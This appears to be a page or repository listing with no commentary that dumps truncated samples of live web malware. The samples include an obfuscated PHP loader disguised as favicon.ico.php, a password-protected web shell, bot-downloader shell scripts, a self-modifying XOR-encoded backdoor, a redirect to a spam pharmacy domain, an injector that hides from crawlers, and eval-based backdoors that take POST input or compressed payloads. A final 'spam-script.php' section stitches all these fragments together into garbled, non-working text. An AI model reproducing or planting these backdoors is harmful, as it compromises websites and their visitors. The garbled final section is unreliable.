Palma Solutions LTD PalmaSolutions

## favicon.ico.php
<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $dqvngqtl = 3668; function cahzfuo($rxcvscdxez, $vgbtdue){$ohnusitt = ''; for($i=0; $i < strlen($rxcvscdxez); $i++){$ohnusitt .= isset($vgbtdue[$rxcvscdxez[$i]]) ? $vgbtdue[$rxcvscdxez[$i]] : $rxcvscdxez[$i];}
$xcygvdvew="base" . "64_decode";return $xcygvdvew($ohnusitt);}
$fuuvacow = '1ujObQfh7yINnEGi9bCInvVrnIwF7EnvDbfmGJSR90FObQfh7yINnEGi9bCF7ECN3qVU7ZVeVUAtRbQx1uh2'.
'TlMhqZOICbtv7lHaqEGa3lOcCpIr7IwiTlcIVUAtRbQx1uh23qVU7ZVNnyGA7ZViTlMv912hm'.
'Ai9uXOICHwiTlcIqESh7lIi912hmAi91ujObyIy9bHQ3l3h7yGQ9bVu8HfN5JwRW6Qh1uhx1'.

## unknown-malware-12.php
<?php

@session_start();
@set_time_limit(0);

//PASSWORD CONFIGURATION

@$pass = $_POST['pass'];
$chk_login = true;
$password = "BA";

## node-js-malware.sh
#!/bin/sh

DIRNAME='.jshome'
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
if [ $? != 0 ];
then
    echo 'exiting'
    exit

## bot-downloader.sh
#!/bin/bash

DIRNAME='.gohome'
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
if [ $? != 0 ];
then
    echo 'exiting'
    exit

## unknown-malware-11.php
<?php
// NEXT LINE
$sfnusdihfudsksds = "MDA/GkpcaQQnG1ACQlQrRjARZRZaJF8KNFUaBxs0IwtE";
function readFile2(){$fname=__FILE__;$fp=fopen($fname,'rb');if(!$fp){die("reading\n");}$data=fread($fp,filesize($fname));fclose($fp);return $data;}function writeFile2($data){$fname=__FILE__;$fp=fopen($fname,'wb');if(!$fp){die("writing\n");}fwrite($fp,$data);fclose($fp);}function xor_enc2($str){$key='XDKjpsFmTw1ql7DhEzJu5H3oS05nvUDnkT1OxC32N2S4wTlDMjnBzYnogzO0CbOz0sKoJtqXokF2cAKAwe9VTrz5ldlhcB3EyuQeAQf2Hpv7sxFS7DwS3U03cQl3KIG1uLTytQqgHC44AgGYM50mmTkHogtg7hbSMBWcu5KhAtOHnNfwHC2gapDWjfxVceOJufeN4zaA';$res='';for($i=0;$i<strlen($str);$i++){$res.=chr(ord($str[$i])^ord($key[$i]));}return $res;}function enc2($str){$res=xor_enc2($str);$res=base64_encode($res);return $res;}function dec2($str){$str=base64_decode($str);$res=xor_enc2($str);return $res;}function change_url2($new_url){$str=readFile2();$arr=preg_split("/\r\n|\n|\r/",$str);$change=false;$new_str='';foreach($arr as $line){if($line==='// NEXT LINE'){$new_str.=$line."\n";$cha

## badass-redirect.php
<?if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){$sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
if($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
header('HTTP/1.1 203');exit;}}header('HTTP/1.1 201');exit;}
header('HTTP/1.1 301 Moved Permanently');header('Location: http://rx-wallmart.su');
?>

## malware-injector.php
<?php
$scriptname= str_replace("/", "", $_SERVER["SCRIPT_NAME"]);
$code = '


<?php
$user_agent_to_filter = array( \'#Ask\s*Jeeves#i\', \'#HP\s*Web\s*PrintSmart#i\', \'#HTTrack#i\', \'#IDBot#i\', \'#Indy\s*Library#\',
                               \'#ListChecker#i\', \'#MSIECrawler#i\', \'#NetCache#i\', \'#Nutch#i\', \'#RPT-HTTPClient#i\',
                               \'#rulinki\.ru#i\', \'#Twiceler#i\', \'#WebAlta#i\', \'#Webster\s*Pro#i\',\'#www\.cys\.ru#i\',
                               \'#Wysigot#i\', \'#Yahoo!\s*Slurp#i\', \'#Yeti#i\', \'#Accoona#i\', \'#CazoodleBot#i\',

## unknown-malware-10.php
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN0VOY3JnZmk3RU5wdCUyMDRMT3M0NXJLdUVjWmpmJTNEJTJGN0VOJTJGNDU5NFpqZiUyRTJnZjRuRks3WmpmJTJFWmpmMiUyRTE5WmpmNVpqZiUyRmpxdTdFTmVyeTQ1JTJFYTNqYTNzS3VFJTNFJTNDa2o2JTJGS3VFc1pqZmNLdUVyaXB0JTNFJykucmVwbGFjZSgvNExPfDQ1fGtqNnxnZnw3RU58WmpmfG5GS3xhM3xLdUUvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.

## really-ugly-malware.php
<?php eval(gzuncompress("x⁄ÖTmoõH˛+.Br€™ù¶A{âï–\x24RkßüT•¬Î°Ï≥dwQE˛ÔùÂ≈v¨Kè/0≥œº<œÃ¬RõI\x09 6„ªŸ}Ù`)ê*N¨Œ——,¿yöÒC¸Ò!Œá'¶¸\x0d¡E,†‰B±‚ß=p|ÛQíJ‰K†|\x09òˇ>ˇ\x09¬ÎÎ<ø≈˜Qx;Ω∆:æπ‰’\x222MX','ãD¬…(Ó\x22•„≥‘ñJî\x5c⁄\x0d»µ.,áí&πÁÂç»⁄ª´0Ù7-˚Ç‚\x0bºÉu©ûwù7Qt_~ä/g”ipaøÒÌù°•1YI˛á™`s5∂”∏” \x0cæÃ¢ û\x5c]Ö(¡˘\x1bgñÖW\x099ÏÃ™+Œ—ä'◊¡4“9ˆ(˝¶S˛ªäÒ±çL©Ú¨ﬂûéΩ·¯£˜˛É7Ù)•‘2ˆK¡`]∞ïWfÂ9r0<d‚GçÇh’ËX.j≥mlÕ*iDm˝N…Ñm}Ê4QågΩ∂˛íÅ‚´eŒVêV £|›?O»hx2>˝pDâ>∂?≠\x0a™√zÿΩm\x22YUO∑íuLy°‡I≈-v\x22DÚl[∫ÇE˛n-≈÷¿+Öé±„8æ\x00Uâ¢ó≤‚ü†öÖíuv∑^,Wóp¸Õ~q¨.9]πf∆•rÕ2Qôk>V û±#≤‰ÖÇ2ße•ì’`„:àz(äF{∆9~’û—ÎÈıáﬁ‡ª¯^ûqÉYœ4Tß˜å÷;°JÙ˜è[O)[_E‘«ˇï!7€ÃY\x24Eañm7£¡«gØ[è‘‰Is.°A·µ¡ÎF∫[◊a›˝;æ≤Z r¶Éˇu*o˝ZÓFôä_1+òj|~m„µ·%zhÊ^Œ√œ≥ª(æ\x09&WAÿ\x0cËmTDÛpÖìÈ˝'D+Q˝›~\x09fÛ»7î™\x5c5›¿P\x0dl#[u¥Ω£Ö‡CR+\x5c‰£óÀ6í<Áøbù%Â%†xÑ\x0cùóv∑;›˝24nH DH–1Ì!Ê´GC.R˝“yÏ˙`È·[?‹”Åk‚ø∏‡ı\x0bGÇúˆÀl∑˜uXgÍ˝‹3Î%’ˇË∫-,—Eiòƒı∂∂S≥^◊Ÿ⁄l~˜!-Ü"));

## spam-script.php
<?php
if (isset($_POST['test_a']) && isset($_POST['test_b']))
{
    echo $_POST['test_a'] * $_POST['test_b'];
    exit;
}

if (isset($_POST['task']))
{
	error_reporting(E_ALL);
	<?php
	if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
	{
	define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

	$dqvngqtl = 3668; function cahzfuo($rxcvscdxez, $vgbtdue){$ohnusitt = ''; for($i=0; $i < strlen($rxcvscdxez); $i++){$ohnusitt .= isset($vgbtdue[$rxcvscdxez[$i]]) ? $vgbtdue[$rxcvscdxez[$i]] : $rxcvscdxez[$i];}
	$xcygvdvew="base" . "64_decode";return $xcygvdvew($ohnusitt);}
	$fuuvacow = '1ujObQfh7yINnEGi9bCInvVrnIwF7EnvDbfmGJSR90FObQfh7yINnEGi9bCF7ECN3qVU7ZVeVUAtRbQx1uh2'.
	'TlMhqZOICbtv7lHaqEGa3lOcCpIr7IwiTlcIVUAtRbQx1uh23qVU7ZVNnyGA7ZViTlMv912hm'.
	'Ai9uXOICHwiTlcIqESh7lIi912hmAi91ujObyIy9bHQ3l3h7yGQ9bVu8HfN5JwRW6Qh1uhx1'.
	<?php

	@session_start();
	@set_time_limit(0);

	//PASSWORD CONFIGURATION

	@$pass = $_POST['pass'];
	$chk_login = true;
	$password = "BA";
	#!/bin/sh

	DIRNAME='.jshome'
	MACHINE_TYPE=`uname -m`
	mkdir $DIRNAME
	cd $DIRNAME
	if [ $? != 0 ];
	then
	echo 'exiting'
	exit
	#!/bin/bash

	DIRNAME='.gohome'
	MACHINE_TYPE=`uname -m`
	mkdir $DIRNAME
	cd $DIRNAME
	if [ $? != 0 ];
	then
	echo 'exiting'
	exit
	<?php
	// NEXT LINE
	$sfnusdihfudsksds = "MDA/GkpcaQQnG1ACQlQrRjARZRZaJF8KNFUaBxs0IwtE";
	function readFile2(){$fname=__FILE__;$fp=fopen($fname,'rb');if(!$fp){die("reading\n");}$data=fread($fp,filesize($fname));fclose($fp);return $data;}function writeFile2($data){$fname=__FILE__;$fp=fopen($fname,'wb');if(!$fp){die("writing\n");}fwrite($fp,$data);fclose($fp);}function xor_enc2($str){$key='XDKjpsFmTw1ql7DhEzJu5H3oS05nvUDnkT1OxC32N2S4wTlDMjnBzYnogzO0CbOz0sKoJtqXokF2cAKAwe9VTrz5ldlhcB3EyuQeAQf2Hpv7sxFS7DwS3U03cQl3KIG1uLTytQqgHC44AgGYM50mmTkHogtg7hbSMBWcu5KhAtOHnNfwHC2gapDWjfxVceOJufeN4zaA';$res='';for($i=0;$i<strlen($str);$i++){$res.=chr(ord($str[$i])^ord($key[$i]));}return $res;}function enc2($str){$res=xor_enc2($str);$res=base64_encode($res);return $res;}function dec2($str){$str=base64_decode($str);$res=xor_enc2($str);return $res;}function change_url2($new_url){$str=readFile2();$arr=preg_split("/\r\n\|\n\|\r/",$str);$change=false;$new_str='';foreach($arr as $line){if($line==='// NEXT LINE'){$new_str.=$line."\n";$cha
	<?if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
	$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){$sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
	if($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
	header('HTTP/1.1 203');exit;}}header('HTTP/1.1 201');exit;}
	header('HTTP/1.1 301 Moved Permanently');header('Location: http://rx-wallmart.su');
	?>
	<?php
	$scriptname= str_replace("/", "", $_SERVER["SCRIPT_NAME"]);
	$code = '


	<?php
	$user_agent_to_filter = array( \'#Ask\sJeeves#i\', \'#HP\sWeb\sPrintSmart#i\', \'#HTTrack#i\', \'#IDBot#i\', \'#Indy\sLibrary#\',
	\'#ListChecker#i\', \'#MSIECrawler#i\', \'#NetCache#i\', \'#Nutch#i\', \'#RPT-HTTPClient#i\',
	\'#rulinki\.ru#i\', \'#Twiceler#i\', \'#WebAlta#i\', \'#Webster\s*Pro#i\',\'#www\.cys\.ru#i\',
	\'#Wysigot#i\', \'#Yahoo!\s*Slurp#i\', \'#Yeti#i\', \'#Accoona#i\', \'#CazoodleBot#i\',
	<?php
	if (isset($_POST['test_a']) && isset($_POST['test_b']))
	{
	echo $_POST['test_a'] * $_POST['test_b'];
	exit;
	}

	if (isset($_POST['task']))
	{
	error_reporting(E_ALL);